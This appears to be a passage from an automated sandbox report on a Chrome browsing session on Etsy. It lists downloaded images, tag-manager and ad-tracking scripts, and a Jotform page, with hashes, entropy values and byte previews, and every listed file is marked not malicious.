                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................].........................!..1A"Qa..2q...#.B..$3Rbr....4Cs....%S......5DTc..&Et...6Fu..d....................................E......................!..1AQaq..".....2..BR..#Cbr....S$34....DTc..............?....4..P$.pl.....ml.(!.0.BDl..ki-.[....9
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):6064
                                                                                                                                                                              Entropy (8bit):7.922911597687458
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5C2CD70EA02A8905B12E5F8AFB41C312
                                                                                                                                                                              SHA1:661BC489F096150840D856C14C430D53CCA27064
                                                                                                                                                                              SHA-256:6567D6187A2E00D938E04154CEF8A403C744E726F5B95A44277303DE8585D1B9
                                                                                                                                                                              SHA-512:5FB2EB6563BE485D59B22FBE61F4F0C67232E10F6119C6BFCE8651FF93CA218E0B770E77E403091D1EE06A54F5667D95A61BA1E7BB42625F9DBDA47D3909EF72
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/e5e4ff/5880861639/il_170x135.5880861639_pcxr.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma...................mdat.......a. !..2.-.P...A@.+....@xO...w%...K-E]..5...G....)i..A.G...#..k.%.s\.x.d....{.I.'...xQ.#qH...............#lt.3.....H.J.S..B..zg:Jn........,.m..x.Pc.......p\O.."....(....s`d..v...5r.Z..7.?.2W_.......*...~.f....R..?.Zl.t.E.8...n......t&t..`.....ak/.b'.s..hT...#..r....%......q.:..(PG.D.D..w.|0t]A._..kn9......q|.nbv%T.#.......[.a.......3b..{s.:..z.....w.i.r.......iz.3...)......p'*...b.j.....F......I...9..3h.2s=5u.IM8]...*..>P.ye..ybh...]o...T.jh<|....r.f.f6..L...mH.....{..o...m#..q..N(.......\..apgX]..A.V...22@q!..I..C2.E .p.*....i....!ukP.R.}..N.Y...... h:.....{...S...]...h..DS.-.....*..{..j[.h#.z...........t..<j.l*.K6.[...-:&E.....H...=|$.$..|.d..D..........Y..........rF[..I...^.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):286971
                                                                                                                                                                              Entropy (8bit):5.547064688674937
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2BD547B92E3A0273B59F7404140E605D
                                                                                                                                                                              SHA1:97ADA793DF436CEA0F6DC097937F8B90A068290B
                                                                                                                                                                              SHA-256:EBAFD46A8D367B921891A213B6E7152651E097B6A6A6953458B33848F27FF6E5
                                                                                                                                                                              SHA-512:B0977E6066B4A592164E390DBACAAF5D8ADFBF1894ACF760D2D87D20494687EA0CD57380829C4D67D3EA7B79ED224ED10674028A39BA1D0C92B767577D4C6D26
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":17,"vtp_instanceDestinationId":"AW-995917074","tag_id":11},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regi
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):9291
                                                                                                                                                                              Entropy (8bit):7.959334643537642
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:15AEA12A79253CFC1C6F2DEE3C5D9D85
                                                                                                                                                                              SHA1:E00E482B92988734A289F01ECD1468D0026E26C6
                                                                                                                                                                              SHA-256:5282EFE0135DCE6D085FA6C7C63C9842E96F91F7E4B2466C1C36B43EF50A8D36
                                                                                                                                                                              SHA-512:590995AB34BE48DB01D4C21219B6103DD67C07BDD8595B2CE80C69C12EFEB04D211A6861628AEB913A4326D2D1B2B86E3CAB41392B75DBC9A7F3B1F207744417
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/a4ec0f/6024473444/iap_200x200.6024473444_ey1kw7xy.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................#=...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma.................#Emdat......... !..2.F. ...A@.Q..6.?5{....s....9.....o9.^.-....{Y3...i..@g.(&...a.L[..........{..)>k..R.1t..k...U.[.Y..kt0.P...m..6.....6.le.+..P....zR*b..iQ7.)^.9..,q.....nI.v...X!....`U.1..},X..4....tE.AC...^........ ...y.7/..q..*"..?>....*#..b.v.|TR.}!Z..........`/;).4_.._...U]R.z...u.r....\!C6....P...&}.....U(..7VeKJ...;(..W(T~......_..*.3.-.].M..<...S.A..T..M.'7z.p.......Bn(..m.^S.D.+.....7..X@.D....y}......c."4..bmQ.........`W..#.1......t..&3{.0.......Hp5.&....%9.9Pq..a..D..r...5!L]....<s...a7.........t....)...B..fU.G.PG...]o..j...@a9N.k1-}....$...........y.........G.F.cR..O..4vts5I[/$f.H,]W...L%..>...a.....<.d..9>%.y...T.....}....{f.R..I....}..;.G.`...;......g..N.2T#j...V?r......+|F...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):19869
                                                                                                                                                                              Entropy (8bit):7.938741730787567
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:63E5A2DE36CC765BF50EF74EF1F8E9E5
                                                                                                                                                                              SHA1:8057EC73840C10AAD239A83A8C8BC69C517351D3
                                                                                                                                                                              SHA-256:E65ED8827A5A4C7404F651C62876ACA9A2898938FDC4CA52F876A1E87E8BA9D9
                                                                                                                                                                              SHA-512:28195EEE781AAC6CC8D96F336814C1A10EAAFEA4B45727DD988252A2CDE95B20B46C673B0CE99CCCF93B63146CECD4A9D7DB97419E84CAD22F5FAFF9201579B6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................A.........................!.1A.Q."aq.2..#BR.3.....$Cb....%Dr.4s.................................6........................!.1AQa.q."...2...#BR..br................?..HSK.K.(........@..b..4..K.J.....joe(-9.P.B..y..J...N.....(P.$.b.)TtRI..(.RA'.x.P4.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):81951
                                                                                                                                                                              Entropy (8bit):7.996940004008955
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:43EC8E81DB693BFBB81B26523C04E89C
                                                                                                                                                                              SHA1:1CE150C17944A8233C71A0E35E64482DA4CDF844
                                                                                                                                                                              SHA-256:06FB0CDF1E1186D6EB7C538AB345EE8CCF3CAE2C3B34291E9B515F5E0EF154E3
                                                                                                                                                                              SHA-512:B936D047BCEE08DDED9F51C103D1951E9AC9F0BB64715228ED3518904504B56CEAAA7601C56B1ACB20DFA1EEC4A61A0A423060BB23146B2A21C745C3B18D8725
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/8201de/5645494984/iap_600x600.5645494984_1u4h533m.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................?....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................?.mdat.....&ey_.....2....p.E.Q@..II^ ...#........A^U.K....YB...........:.^.k..q)..*T.R.....FC...M...@.xk..Wi(F.../.G.e...H...ues.J.L.1J ..d.3pB.......1.sErs]r.....f....x.B...O1..>......J..@..-.E....i.}..k......\/..A..0 ...s..C.U.Ap)....2y..H.B..S.....w......a"V. .yK......./.gR....B......k.@M..i......u....6>%C..yE.C.....@....}O...C7..|.[i...N......w.;.?'...h....i...-..r5.VW1.._.=y-U..m-.4.x2.OW.L...Z....q..0i.J.|...6O..KtKkq. ..P.U..<8+...d.R.M*N....>.'#.........=.^w{.)..F....J...l.^....:.`e....\..aC_......>.aTH...1fke.i..#....ipW...k............F.,..ra,..2.J..H....J....t...U.....@.....Um7!oi!...c4+.l..*..fp$3.f[}S .r....t.p....."C.t.:.....BJ0..j..}..do$E..v...e&.C...`..6...2....?.j..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4285
                                                                                                                                                                              Entropy (8bit):7.651117605944611
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2B1CA92CE4ABE158683ABD25A40402F4
                                                                                                                                                                              SHA1:C9E5C8331503F0160F656114D2422850D8771985
                                                                                                                                                                              SHA-256:BF1D534B51A7D2C1BE3C4932B40A8002BA672B0AC337E5002E4B93D8A563AA80
                                                                                                                                                                              SHA-512:14DA262494CF9B0FDACE684388AC29F11D3313855440AB8C4AA4ABAE4EE6361F2F4F340FF4A6905070C94BFBD74777F1D402C7BE272D0BF184DE54FEF842D89B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......d.d..".........................................8.........................!.1."AQ.aq.#2...$Br....Rb....................................2........................!1.."AQq.2a....3.....Br.............?....#.m?.uN.....h....<.....m....%YpF0j.I|..."Y..~.6...[.......:. .p.%R....z9..j..4...q...M{u.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (5642)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):18924
                                                                                                                                                                              Entropy (8bit):5.085787116267673
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7D5D5D72CCFA6D60392834B7B0B99416
                                                                                                                                                                              SHA1:FC856A0871EEBEE43D436F489394456FC2A0903E
                                                                                                                                                                              SHA-256:67675CAE617384A57650F1135A558DA02B8D9619635546A22BD0EECF65F1FCDF
                                                                                                                                                                              SHA-512:D10CEEA186EC28BB7876FE2C292989F6C9F0050A3286154A8C4D659A2945973484280E55633147496B6607C5CB7BD9F3A836F0D95734CCF1356071BE0C2800D3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://form.jotform.com/242923371946059
                                                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html lang="en" class="supernova "><head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<link rel="alternate" type="application/json+oembed" href="https://www.jotform.com/oembed/?format=json&amp;url=https%3A%2F%2Fform.jotform.com%2F242923371946059" title="oEmbed Form">.<link rel="alternate" type="text/xml+oembed" href="https://www.jotform.com/oembed/?format=xml&amp;url=https%3A%2F%2Fform.jotform.com%2F242923371946059" title="oEmbed Form">.<meta property="og:title" content="Form" >.<meta property="og:url" content="https://form.jotform.com/242923371946059" >.<meta property="og:description" content="Please click the link to complete this form." >.<meta name="slack-app-id" content="AHNMASS8M">.<meta property="og:image" content="https://cdn.jotfor.ms/assets/img/landing/opengraph.png" />.<link rel="shortcut icon" href="https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-ligh
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):228513
                                                                                                                                                                              Entropy (8bit):5.545139892740723
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:48AA72116A9D406B16022FE012123D64
                                                                                                                                                                              SHA1:02C0C4919682646AA025875132BBAFAF909FDE82
                                                                                                                                                                              SHA-256:29DE86F19787E402437F8A09CBDD6DD65EC032B7FF11FA3DB03CCD14029DA550
                                                                                                                                                                              SHA-512:1BD40E4117191E62374D3DE671A0DE599F56AB5C1FE06A067350502BD6B7875080EF6EB0F038548D6D5C4D4C64FF654C2F5021745F018100BD5680655838882C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-8666735","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"",
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5312), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5312
                                                                                                                                                                              Entropy (8bit):5.93251384371361
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6EE96E06CC40E06DF7C910DCDA1F7715
                                                                                                                                                                              SHA1:1E434A97BD7F604DF0163836E6A1097D8ADEEB31
                                                                                                                                                                              SHA-256:0AA4160B1F73293E8AA608CD1455E75AFF0A1C3A1908B48EE0524E3E3097C425
                                                                                                                                                                              SHA-512:866FF968F018DA66C70F0E1CCF8B35CB188CBBCACAD445FCA84915C4F93855150D3F531F02DAAD240A3825400BCFE2A21F0611CAE6C6DFC9125040DFB049E19D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googleadservices.com/pagead/conversion/658194373/?random=1729505278413&cv=11&fst=1729505278413&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fv2nt.molouscre.com%2F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):23310
                                                                                                                                                                              Entropy (8bit):7.988089169582295
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:EC0D6ADF7D46D4B31C7A4AB08F57635E
                                                                                                                                                                              SHA1:6E6CA77F88FCAE8CB052EDC0D408A99861E52635
                                                                                                                                                                              SHA-256:EEC1E8D2AAB988671EEB7A729C602C23606153FA2EB2CEE75055273DCB325023
                                                                                                                                                                              SHA-512:29B0FE3FC4757DA3A1F93405B60878DD3017FA41582C6BB4A1A7427EF718C559117C9E66B8C2D839F60DE11FD7F77F3B725CE784700A91119CD3DF9FAFB09EBC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/ij/803c97/5596217814/ij_300x300.5596217814_8y4xqzmm.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................Z....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma.................Z.mdat....."%r....4 2.......q@.z...G.....'.K&.-L........{~......]..$r!_.^JY.,y..{.D% ..../j$.aeO...3..lS.....i......6+.6.q..fy.?.ll.....Z.W......&.....<.3e..{.,..\w.M......:.AE...|..m#......fi..:."6...n,...T.9.;.tD..R..&?.F.NH.p{.,...a...qW.....7v.u~7.E.4)..!......x......Zx"...8>.YL?...W#G...]=a...fL..P;.a.'1.(5.%1...h.m.5.4...A^.~<b.v..[^..k-.+.{..m......A . s3*.q..Gk.....#..w......fOH=%.U.#^x#u.(../..;.G.~.7..2...}.:.P&..p.J.......!...v....+.j.=$aB.l.V.)...;v......f..\....@..N..y+._.._..V.C.{G%..M/..'.dG.).......V.|........."f.7.&].E..3...r.....K.H.&....^.S....=..k..B...C".0.o..z.7.q.....~..W).c.../.TbP...t....,..Z..,.{....f..@.^.#...(..d..ja..@.........-.6.....`...|....C...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1046), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1046
                                                                                                                                                                              Entropy (8bit):5.633931457291386
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:40859D9BD98F4DF5FBB4A1D1CB96CCE9
                                                                                                                                                                              SHA1:B9F6553803D8F3FAFBD7FF870C0712FF76BD0190
                                                                                                                                                                              SHA-256:BC60E4E9B7BC57BE65EEA388FB335DD0B251924B1BE6D897711BF96CB7E71132
                                                                                                                                                                              SHA-512:2E5142F3DA16537E3E0CCBF52BB9B34D346E0712D733DE28CABE27196BF89A842EA824D19115583D56A7CB97F44C5F1A45AD1C4D5D8618F7A43E6F470393FCD7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://8666735.fls.doubleclick.net/activityi;dc_pre=CMaGj5-dn4kDFcY0VQgdndQDdQ;src=8666735;type=count0;cat=etsy_00;ord=1;num=9371495004602;npa=0;auiddc=2084024919.1729505276;u2=QVrcCcY9ItAhN5czrTjjfzhguMEe;ps=1;pcor=685437968;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://pixel.streetmetrics.io/pixel/62f2e71d-3885-4822-ba89-6e017b2f1a1e" width="1" height="1"><img src="https://tags.w55c.net/rs?id=590f83e499a54109bd553d1e2ebaf867&t=marketing" /><img height="1" width="1" style="border-style:none;" alt="" src="//insight.adsrvr.org/track/conv/?adv=r09jr34&ct=0:ezyvggn&fmt=3"/><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CMaGj5-dn4kDFcY0VQgdndQDdQ;src=8666735;type=count0;cat=etsy_00;ord=1;num=9371495004602;npa=0;auiddc=*;u2=QVrcCcY9ItAhN5czrTjjfzhguMEe;ps=1;pcor=685437968;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):112126
                                                                                                                                                                              Entropy (8bit):7.979336826051873
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C15CEC9BAF7615EB8EEFD030C94578E0
                                                                                                                                                                              SHA1:EC8401C5E5F2F2ADA7BA1A87BA736F18FB2BBAE2
                                                                                                                                                                              SHA-256:CCA93CE756ECB958FB27974E57E11D6E66C3F51B171235E79BCC6DE01270BD3A
                                                                                                                                                                              SHA-512:2454F5BD16195E8EDFDF92DFBDAD5D4E45F52CAEABA09598CF2CAEBD750DCD2083582FD8F9AFCD292DB06A20846147FF82B746A80A44AC090B7EA1C51A628AA0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................\.........................!.1."AQaq.2......#B.Rbr......$3C..%4S....DTcs....5dt.&EU....'..................................;......................!..1AQa..q..."2R..B..#b....3r..CS$............?.......L...&.o.t...:.".H..DL..B...>..]..f..U........
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):123372
                                                                                                                                                                              Entropy (8bit):7.9654227202565595
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:354034A8DED3FF8B764A8D89F37D225E
                                                                                                                                                                              SHA1:7F3E24CCBAC75416BDD8C9E56B586A7134BC7E6C
                                                                                                                                                                              SHA-256:81FF9944D8870866D70F56F110BDF43168A50CCC2FCBC74CDCB2438951CABD8C
                                                                                                                                                                              SHA-512:E8DF975B46EA4AA80D6CEC55E508AAF4F3DC1D1D51BE84457188A8FB9E2E44F87FD7B6B06557573DD79511A68871C41DF3E4A3BF1EFBF3E9E01B7F68ADBD57C8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X.."........................................I.........................!.1."AQ..aq2B..#R...3b..$Sr..Cc..4....%Ds...T.................................8........................!1AQa.."2q..#BR..3....$bC.4r.............?..1^2{h..L.39....<Fyc.NI..O..."vQ..k3Wv.f{..z.......!G}v.........:r....Me
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87631
                                                                                                                                                                              Entropy (8bit):7.969929862266566
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E187679BA5D19C7DEA0C79D5A1831CE4
                                                                                                                                                                              SHA1:12FDC49A3F8CC1484F8B2C90EA646BCCBF4C2792
                                                                                                                                                                              SHA-256:F4B04F0953D92F20BC915DD69532950DBC02B81F02D864495E10DD3D2F43EF87
                                                                                                                                                                              SHA-512:F1EB78EA813BC77EDA84D3E671AF931D156B70326F967EE1DA6FEB666CCDC12D7F1D43DC8EBDC22EE53C3EEDAFBF8D1201726F23ED5A3413918D407BC975F627
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
